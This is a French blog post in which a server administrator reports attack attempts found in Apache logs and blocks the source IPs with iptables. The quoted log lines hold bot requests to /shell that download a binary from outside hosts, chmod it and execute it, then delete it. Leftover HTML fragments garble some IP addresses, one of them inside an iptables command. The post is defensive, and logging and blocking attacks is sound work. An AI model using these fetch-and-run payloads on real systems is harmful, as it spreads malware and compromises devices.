Faille de sécurité : NW_BBBarm7 ?

117 x served & 20 x viewed

J’ai pu voir dans les logs :

59.21.219.217 - - [01/Apr/2022:03:31:59 +0200] "m+-rf+NW_BBBarm7%3b%23&remoteSubmit=Save" 400 0 "-" "-"
39.103.237.21 - - [01/Apr/2022:03:32:24 +0200] "m+-rf+NW_BBBarm7%3b%23&remoteSubmit=Save" 400 0 "-" "-"
39.105.54.139 - - [01/Apr/2022:04:24:22 +0200] "GET /shell?cd+/tmp;+wget+http:/\\/51.81.133.91/FKKK/NW_BBBarm;+chmod+777+NW_BBBarm;+./NW_BBBarm Jaws.Selfrep;rm+-rf+NW_BBBarm" 400 0 "-" "-"
222.85.179.149 - - [01/Apr/2022:09:06:42 +0200] "GET /shell?cd+/tmp;+wget+http:/\\/51.81.133.91/FKKK/NW_BBBarm;+chmod+777+NW_BBBarm;+./NW_BBBarm Jaws.Selfrep;rm+-rf+NW_BBBarm" 400 0 "-" "-"
222.178.152.80 - - [01/Apr/2022:09:46:47 +0200] "m+-rf+NW_BBBarm7%3b%23&remoteSubmit=Save" 400 0 "-" "-"
123.56.177.98 - - [01/Apr/2022:10:14:00 +0200] "m+-rf+NW_BBBarm7%3b%23&remoteSubmit=Save" 400 0 "-" "-"
222.173.108.94 - - [01/Apr/2022:11:42:19 +0200] "m+-rf+NW_BBBarm7%3b%23&remoteSubmit=Save" 400 0 "-" "-"

J’ai donc filtré les IP :

#  iptables -A INPUT -s 59.21.219.217 -j DROP
#  iptables -A INPUT -s 39.103.237.21 -j DROP
#  iptables -A INPUT -s 39.105.54.139 -j DROP
#  iptables -A INPUT -s 222.85.179.149 -j DROP
#  iptables -A INPUT -s 222.178.152.80 -j DROP
#  iptables -A INPUT -s 123.56.177.98 -j DROP
#  iptables -A INPUT -s 222.173.108.94 -j DROP
#  iptables -A INPUT -s 51.81.133.91 -j DROP
# /usr/sbin/iptables-save > /etc/iptables/rules.v4

L’ip : 51.81.133.91

Localisation R.A.S. chinoise de Hong Kong
Réputation 100 %
Anonymat Aucun détection
Usage Attribué
Source ARIN
Nom d’hote ip91.ip-51-81-133.us

 

J’ai pu voir aussi :

# grep " 400 " /var/log/apache2/access.humhub.log | grep shell | grep -v NW_BBBarm
39.103.239.37 - - [01/Apr/2022:00:34:45 +0200] "GET /shell?cd+/tmp;+wget+http:/\\/#ff0000;">146.0.75.242/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm" 400 0 "-" "-"
41.36.111.76 - - [01/Apr/2022:05:06:53 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+ jswl.jdaili.xyz/jaws;sh+/tmp/jaws" 400 0 "-" "-"
47.100.208.164 - - [01/Apr/2022:06:24:45 +0200] "GET /shell?cd+/tmp;+wget+http:/\\/#ff0000;">146.0.75.242/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm" 400 0 "-" "-"
39.103.232.57 - - [01/Apr/2022:09:36:04 +0200] "GET /shell?cd+/tmp;+wget+http:/\\/#ff0000;">146.0.75.242/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm" 400 0 "-" "-"

J’ai donc filtré :

#  iptables -A INPUT -s 39.103.239.37 -j DROP
#  iptables -A INPUT -s 41.36.111.76 -j DROP
#  iptables -A INPUT -s 47.100.208.164 -j DROP
#  iptables -A INPUT -s 39.103.232.57 -j DROP
#  iptables -A INPUT -s #ff0000;">146.0.75.242 -j DROP
# /usr/sbin/iptables-save > /etc/iptables/rules.v4

L’IP :#ff0000;">146.0.75.242

Localisation Pays-Bas
Réputation 86 %
Anonymat Aucun détection
Usage Attribué
Source RIPE
Nom d’hote 146.0.75.242

Laisser un commentaire

Votre adresse e-mail ne sera pas publiée.

Time limit is exhausted. Please reload CAPTCHA.